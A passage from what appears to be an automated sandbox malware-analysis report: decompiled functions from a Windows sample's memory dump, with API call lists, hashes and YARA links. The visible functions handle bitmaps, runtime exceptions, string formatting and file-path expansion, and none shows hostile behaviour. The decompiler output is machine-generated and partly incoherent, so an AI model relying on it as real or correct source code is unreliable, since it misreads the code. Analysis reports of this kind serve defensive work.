          • Opcode Fuzzy Hash: bd87c9202ac56bee3cb365c306e12f40a58e19e211b0957f6f061b91d0a7961c
          • Instruction Fuzzy Hash: F531CE72A2025AABDF258F65DC45DEE7BF9EB60310F054128FC04DA191E736DDA1CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020A4F8, Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020A4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0x230060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E0020963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E0020952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E0020963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E0020958C(_v20);
					_t13 = E0020975D(_t21, _t32, _t22, E00209549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














          0x0020a4f8
          0x0020a4f8
          0x0020a50e
          0x0020a512
          0x0020a515
          0x0020a517
          0x0020a520
          0x0020a520
          0x0020a529
          0x0020a536
          0x0020a541
          0x0020a54a
          0x0020a54e
          0x0020a551
          0x0020a553
          0x0020a553
          0x0020a54e
          0x0020a558
          0x0020a568
          0x0020a570
          0x0020a572
          0x0020a574
          0x0020a57c

          APIs
          • LoadBitmapW.USER32(00000065), ref: 0020A508
          • GetObjectW.GDI32(00000000,00000018,?), ref: 0020A529
          • DeleteObject.GDI32(00000000), ref: 0020A551
          • DeleteObject.GDI32(00000000), ref: 0020A570
            • Part of subcall function 0020963A: FindResourceW.KERNEL32(00000066,PNG,?,?,0020A54A,00000066), ref: 0020964B
            • Part of subcall function 0020963A: SizeofResource.KERNEL32(00000000,76B95B70,?,?,0020A54A,00000066), ref: 00209663
            • Part of subcall function 0020963A: LoadResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209676
            • Part of subcall function 0020963A: LockResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209681
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
          • String ID:
          • API String ID: 142272564-0
          • Opcode ID: c06b7441c5eabf76d302e93c6ed9ceb48a9a5ed40b55693d226c1540a8fdd100
          • Instruction ID: 8b553398e18f76f002e82e6907ea409be9bc9448bbb301c4f79c5e1f819f68a3
          • Opcode Fuzzy Hash: c06b7441c5eabf76d302e93c6ed9ceb48a9a5ed40b55693d226c1540a8fdd100
          • Instruction Fuzzy Hash: 1601A73295031537C72237B95C5AE7F7B6EEB86B51F890110FA01B71D3EE518C2256A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00211A89, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
          Download Yara Rule
          C-Code - Quality: 20%
          			E00211A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E002120D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0020F1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E002122DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00211893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0020F1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












          0x00211a89
          0x00211a89
          0x00211a8c
          0x00211a91
          0x00211a94
          0x00211a96
          0x00211a99
          0x00211a9c
          0x00211a9d
          0x00211aa0
          0x00211aa5
          0x00211aa5
          0x00211aa8
          0x00211aac
          0x00211aaf
          0x00211ab4
          0x00211ab1
          0x00211ab1
          0x00211ab1
          0x00211ab7
          0x00211abd
          0x00211ac0
          0x00211ac2
          0x00211ac5
          0x00211ac8
          0x00211ac9
          0x00211ad2
          0x00211ad7
          0x00211ada
          0x00211ae0
          0x00211ae3
          0x00211ae6
          0x00211ae9
          0x00211aea
          0x00211aed
          0x00211af8
          0x00211afc
          0x00000000
          0x00211afc
          0x00211b03

          APIs
          • ___BuildCatchObject.LIBVCRUNTIME ref: 00211AA0
            • Part of subcall function 002120D8: ___AdjustPointer.LIBCMT ref: 00212122
          • _UnwindNestedFrames.LIBCMT ref: 00211AB7
          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00211AC9
          • CallCatchBlock.LIBVCRUNTIME ref: 00211AED
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
          • String ID:
          • API String ID: 2633735394-0
          • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
          • Instruction ID: 469047e20fd019d627fe1a27587cd0e473e0302969d3da072d6f0038d709bedd
          • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
          • Instruction Fuzzy Hash: 3C01C532410109ABDF129F95CC01EDA7BBAEFA8754F158115FE1865161D372E8B1DFA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002115E6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E002115E6() {
				void* _t4;
				void* _t8;

				E002129B7();
				E0021294B();
				if(E0021268E() != 0) {
					_t4 = E00211726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E002126CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





          0x002115e6
          0x002115eb
          0x002115f7
          0x002115fc
          0x00211601
          0x00211603
          0x0021160e
          0x00211605
          0x00211605
          0x00000000
          0x00211605
          0x002115f9
          0x002115f9
          0x002115fb
          0x002115fb

          APIs
          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002115E6
          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002115EB
          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002115F0
            • Part of subcall function 0021268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0021269F
          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00211605
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
          • String ID:
          • API String ID: 1761009282-0
          • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
          • Instruction ID: 540bd0fc76ec87da0c026c68929c7b6996b7a223f2bd8052447b9b581fd26dc4
          • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
          • Instruction Fuzzy Hash: 18C00228030683E01C243EB923126ED13C949B27C5B9514D1BA4116197A96608FF1C32
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
          Download Yara Rule
          C-Code - Quality: 51%
          			E0020975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E0020960F() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0x2233ac);
					_push(1);
					_push(0);
					_push(0x22417c);
					if( *0x22dff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0x22418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E0020E920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0x22dedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00209954();
			}
























































          0x0020975d
          0x00209767
          0x00209782
          0x0020978e
          0x00209798
          0x0020979f
          0x002097a3
          0x002097a4
          0x002097aa
          0x002097ac
          0x002097ac
          0x002097b3
          0x002097b5
          0x002097b6
          0x002097be
          0x002097bf
          0x002097c0
          0x002097cd
          0x00209948
          0x00000000
          0x002097d3
          0x002097d3
          0x002097e3
          0x002097e8
          0x002097ec
          0x002097f9
          0x00209803
          0x00209804
          0x0020980a
          0x0020981c
          0x00209820
          0x00209822
          0x00209823
          0x00209825
          0x00209826
          0x00209827
          0x0020982a
          0x0020982b
          0x0020982c
          0x00209831
          0x00209835
          0x0020983b
          0x00209851
          0x00209859
          0x00209863
          0x00209869
          0x0020986d
          0x00209876
          0x0020987b
          0x0020987e
          0x00209895
          0x0020989b
          0x002098a9
          0x002098ab
          0x002098b7
          0x002098ba
          0x002098cf
          0x002098d2
          0x002098d6
          0x002098da
          0x002098de
          0x002098e5
          0x002098e9
          0x002098ed
          0x002098f6
          0x00209901
          0x00209906
          0x00209907
          0x0020990d
          0x00209914
          0x0020990f
          0x0020990f
          0x0020990f
          0x0020991a
          0x00209921
          0x00209921
          0x00209924
          0x0020992b
          0x0020992e
          0x00209935
          0x00209938
          0x0020993f
          0x00209944
          0x00209946
          0x00209946
          0x00000000
          0x00209944
          0x0020983d
          0x00209844
          0x00209844
          0x0020980c
          0x00209813
          0x00209816
          0x00209816
          0x002097f1
          0x00000000
          0x002097f1
          0x002097cd
          0x00209769
          0x0020976d
          0x00209771
          0x00000000

          APIs
            • Part of subcall function 0020960F: GetDC.USER32(00000000), ref: 00209613
            • Part of subcall function 0020960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0020961E
            • Part of subcall function 0020960F: ReleaseDC.USER32(00000000,00000000), ref: 00209629
          • GetObjectW.GDI32(?,00000018,?,00000000,?,76B95B70), ref: 0020978E
            • Part of subcall function 00209954: GetDC.USER32(00000000), ref: 0020995D
            • Part of subcall function 00209954: GetObjectW.GDI32(?,00000018,?,?,?,76B95B70,?,?,?,?,?,0020977A,?,?,?), ref: 0020998C
            • Part of subcall function 00209954: ReleaseDC.USER32(00000000,?), ref: 00209A20
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ObjectRelease$CapsDevice
          • String ID: (
          • API String ID: 1061551593-3887548279
          • Opcode ID: c8c1e8f39f14be1ab25283bd10a2fe477945997c249f9e544690b460c1005e59
          • Instruction ID: b05911fa2d069546e512c541120f67f9061e80fe77307b475064eadd67417d81
          • Opcode Fuzzy Hash: c8c1e8f39f14be1ab25283bd10a2fe477945997c249f9e544690b460c1005e59
          • Instruction Fuzzy Hash: AD6114B1218305AFD310CFA4D888E6BBBE8FF89704F10491DF59AC7262D671E955CB62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00200A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
          Download Yara Rule
          C-Code - Quality: 17%
          			E00200A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E0020C339();
						_t28 = E001FDA42(_t41, 0x96);
						return E00209735( *0x2375d8, E001FDA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E001FDA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E0020A57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00200D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E001FDA42(__ecx, 0xc8) =  &_v516;
										__eax = E001F3E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E0020A57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E001FDA42(_t41);
							L7:
							_push(0);
							L8:
							return E0020A57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00200D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00209D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E001FDA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E001FDA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E001FDA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













          0x00200a9f
          0x00200aa9
          0x00200aab
          0x00200aae
          0x00200ab1
          0x00200cd8
          0x00200cdb
          0x00200cdd
          0x00200ce9
          0x00000000
          0x00200d00
          0x00200ab7
          0x00200ab7
          0x00200cce
          0x00200bfb
          0x00200c00
          0x00200c01
          0x00200b3e
          0x00200b3e
          0x00200b07
          0x00000000
          0x00200b07
          0x00200abd
          0x00200ac0
          0x00200bc0
          0x00200bc3
          0x00200c83
          0x00200c83
          0x00200c86
          0x00200cc4
          0x00000000
          0x00200cc4
          0x00200c88
          0x00200c88
          0x00200c8b
          0x00200cbd
          0x00000000
          0x00200cbd
          0x00200c8d
          0x00200c8d
          0x00200c90
          0x00200cb0
          0x00200cb3
          0x00000000
          0x00200cb3
          0x00200c92
          0x00200c92
          0x00200c95
          0x00200ca6
          0x00000000
          0x00200ca6
          0x00200c97
          0x00200c97
          0x00200c9a
          0x00200c9c
          0x00000000
          0x00200c9c
          0x00200bc9
          0x00200bc9
          0x00200c7c
          0x00000000
          0x00200c7c
          0x00200bcf
          0x00200bd2
          0x00200bd5
          0x00200bdb
          0x00000000
          0x00200be2
          0x00000000
          0x00000000
          0x00200bec
          0x00000000
          0x00000000
          0x00200bf6
          0x00000000
          0x00000000
          0x00200c08
          0x00000000
          0x00000000
          0x00200c0c
          0x00000000
          0x00000000
          0x00200c10
          0x00200c13
          0x00000000
          0x00000000
          0x00200c1a
          0x00000000
          0x00000000
          0x00200c21
          0x00000000
          0x00000000
          0x00200c28
          0x00200c2b
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00200c35
          0x00200c38
          0x00000000
          0x00000000
          0x00200c4d
          0x00200c59
          0x00200c5e
          0x00200c61
          0x00200c67
          0x00000000
          0x00000000
          0x00200bdb
          0x00200bd5
          0x00200ac6
          0x00200ac6
          0x00200bb7
          0x00200bb9
          0x00200b5b
          0x00200b5b
          0x00200ae3
          0x00200ae3
          0x00200ae5
          0x00000000
          0x00200aea
          0x00200acf
          0x00200ad5
          0x00000000
          0x00200af2
          0x00200af4
          0x00200af9
          0x00000000
          0x00000000
          0x00200adc
          0x00200ade
          0x00000000
          0x00000000
          0x00200b00
          0x00200b02
          0x00000000
          0x00000000
          0x00200b0d
          0x00200b10
          0x00000000
          0x00000000
          0x00200b1c
          0x00200b1f
          0x00000000
          0x00000000
          0x00200b23
          0x00200b26
          0x00000000
          0x00000000
          0x00200b2a
          0x00200b2d
          0x00000000
          0x00000000
          0x00200b34
          0x00200b36
          0x00200b3b
          0x00200b3c
          0x00000000
          0x00000000
          0x00200b46
          0x00200b49
          0x00000000
          0x00000000
          0x00200b4d
          0x00200b50
          0x00000000
          0x00000000
          0x00200b54
          0x00200b56
          0x00000000
          0x00000000
          0x00200b63
          0x00200b65
          0x00000000
          0x00000000
          0x00200b6c
          0x00200b6f
          0x00000000
          0x00000000
          0x00200b76
          0x00200b79
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00200b80
          0x00200b83
          0x00200b8b
          0x00000000
          0x00000000
          0x00200ba0
          0x00200ba3
          0x00000000
          0x00000000
          0x00200baa
          0x00200bad
          0x00200b12
          0x00200b17
          0x00200b18
          0x00000000
          0x00000000
          0x00200ad5
          0x00200acf
          0x00200ac0
          0x00200d09
          0x00200d09

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _swprintf
          • String ID: %ls$%s: %s
          • API String ID: 589789837-2259941744
          • Opcode ID: 0bb84682f65ddf68dce3c22055d8ef26e12309bf73a8b4ee0ad888fa84282b45
          • Instruction ID: 72a9f202dbd74d23142668f651e4a7b207f2fa3947ba899b3d05f2b38c0b309f
          • Opcode Fuzzy Hash: 0bb84682f65ddf68dce3c22055d8ef26e12309bf73a8b4ee0ad888fa84282b45
          • Instruction Fuzzy Hash: 685126316BC305FAF7201F909DC6F367669AB05B0CFA08506B78A694E3D6E259307A16
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E00219E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
